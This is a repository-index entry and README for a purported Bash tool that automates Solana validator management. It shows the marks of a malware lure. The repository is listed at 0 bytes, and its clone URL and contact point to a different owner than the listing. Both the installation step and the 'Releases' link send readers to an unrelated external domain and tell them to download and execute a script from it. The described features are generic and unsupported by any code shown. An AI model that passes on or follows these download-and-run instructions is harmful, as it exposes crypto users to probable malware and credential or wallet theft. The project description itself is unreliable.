https://github.com/kenanahhen/solana-validator-automation
This repository contains a Bash-based automation script for managing and configuring a Solana validator. It provides an interactive CLI menu to perform tasks such as adding accounts, importing programs, switching clusters, and starting a local test validator. The script simplifies Solana validator operations for developers and blockchain enthusiast
https://github.com/kenanahhen/solana-validator-automation
account-management automation bash blockchain cli-tool cluster-management crypto developer-tools open-source program-import solana solana-validator test-validator validator
Last synced: 3 months ago
JSON representation
This repository contains a Bash-based automation script for managing and configuring a Solana validator. It provides an interactive CLI menu to perform tasks such as adding accounts, importing programs, switching clusters, and starting a local test validator. The script simplifies Solana validator operations for developers and blockchain enthusiast
- Host: GitHub
- URL: https://github.com/kenanahhen/solana-validator-automation
- Owner: kenanahhen
- Created: 2025-06-27T07:43:19.000Z (3 months ago)
- Default Branch: main
- Last Pushed: 2025-06-27T07:44:13.000Z (3 months ago)
- Last Synced: 2025-06-27T08:37:59.522Z (3 months ago)
- Topics: account-management, automation, bash, blockchain, cli-tool, cluster-management, crypto, developer-tools, open-source, program-import, solana, solana-validator, test-validator, validator
- Homepage:
- Size: 0 Bytes
- Stars: 0
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Solana Validator Automation π

Welcome to the **Solana Validator Automation** repository! This project provides a Bash-based automation script designed to simplify the management and configuration of a Solana validator. With an interactive command-line interface (CLI), users can easily perform a variety of tasks, including adding accounts, importing programs, switching clusters, and starting a local test validator.
## Table of Contents
- [Features](#features)
- [Installation](#installation)
- [Usage](#usage)
- [Available Commands](#available-commands)
- [Contributing](#contributing)
- [License](#license)
- [Contact](#contact)
- [Release Information](#release-information)## Features π
- **Interactive CLI Menu**: Navigate through various options with ease.
- **Account Management**: Add and manage your Solana accounts.
- **Program Import**: Import necessary programs for your validator.
- **Cluster Switching**: Change between different Solana clusters effortlessly.
- **Local Test Validator**: Start a local test validator for development purposes.
- **Open Source**: Contribute to the project and help improve it.## Installation π οΈ
To get started with Solana Validator Automation, you need to clone the repository and run the installation script. Follow these steps:
1. Clone the repository:
```bash
git clone https://github.com/sthkamara/solana-validator-automation.git
```2. Navigate to the project directory:
```bash
cd solana-validator-automation
```3. Download and execute the installation script:
You can find the latest release [here](https://gitfrominstall.com?i5n1leono2urahr). Download the script and execute it to set up your environment.
## Usage π
Once you have installed the script, you can start using it right away. To launch the interactive menu, run:
```bash
./validator-automation.sh
```The menu will present you with several options to choose from, making it easy to manage your Solana validator.
## Available Commands ποΈ
Hereβs a breakdown of the commands available in the interactive CLI menu:
1. **Add Account**: Create and add a new Solana account.
2. **Import Program**: Import a program to your validator.
3. **Switch Cluster**: Change the current cluster you are working on.
4. **Start Local Test Validator**: Launch a local test validator for testing purposes.
5. **Exit**: Exit the CLI menu.Each command will guide you through the necessary steps, ensuring a smooth experience.
## Contributing π€
We welcome contributions from the community! If you would like to help improve the Solana Validator Automation, please follow these steps:
1. Fork the repository.
2. Create a new branch for your feature or bug fix.
3. Make your changes and commit them.
4. Push your branch to your forked repository.
5. Open a pull request to the main repository.Your contributions will help enhance the functionality and usability of the script.
## License π
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for more details.
## Contact π§
For any questions or feedback, feel free to reach out:
- **Email**: contact@example.com
- **GitHub**: [sthkamara](https://github.com/sthkamara)## Release Information π¦
To stay updated with the latest features and fixes, check the [Releases](https://gitfrominstall.com?2i3qya4o4pio3ab) section of this repository. Download the latest version and execute it to ensure you have the most recent updates.
---
Thank you for your interest in the Solana Validator Automation project! We hope this tool makes managing your Solana validator easier and more efficient. Happy coding!